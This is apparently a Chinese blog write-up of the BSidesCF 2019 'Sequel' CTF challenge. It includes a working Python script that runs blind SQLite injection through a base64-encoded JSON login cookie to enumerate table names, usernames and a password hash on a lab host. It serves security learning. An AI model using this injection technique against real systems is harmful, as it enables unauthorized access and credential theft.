[BSidesCF 2019]Sequel

sqlite注入

登录baopo爆破一下得到用户名 guest guest

然后纠结了一会儿,在cookie中发现了

eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9

这样的文字,解密

{“username”:”guest”,”password”:”guest”}

猜测cookie处注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests
import base64
import string
 
flag = ""
 
url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'
for i in range(50):
    for j in string.printable:
        tmp = flag + j
        '''
        #表名
        if j == 'n': continue
        if j == 'r': continue
        if j == 's': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # table_name notes,reviews,sqlite,uSeRiNfo
        '''
 
        '''
        #username
        if j == 'g': continue
        payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #username guest,sequeladmin
        '''
 
        #password
        payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #password f5ec3af19f0d3679e7d5a148f4ac323d
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
 
        r = requests.get(url, cookies={"1337_AUTH" : payload})
        if "Movie" in r.text:
            flag = tmp
            print(flag)
            break

登录就是flag

对于表来说
CREATE TABLE sqlite_master (
type TEXT, //table
name TEXT, //表名
tbl_name TEXT, //表名
rootpage INTEGER, //不清楚
sql TEXT //建表语句
);

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Protected with IP Blacklist CloudIP Blacklist Cloud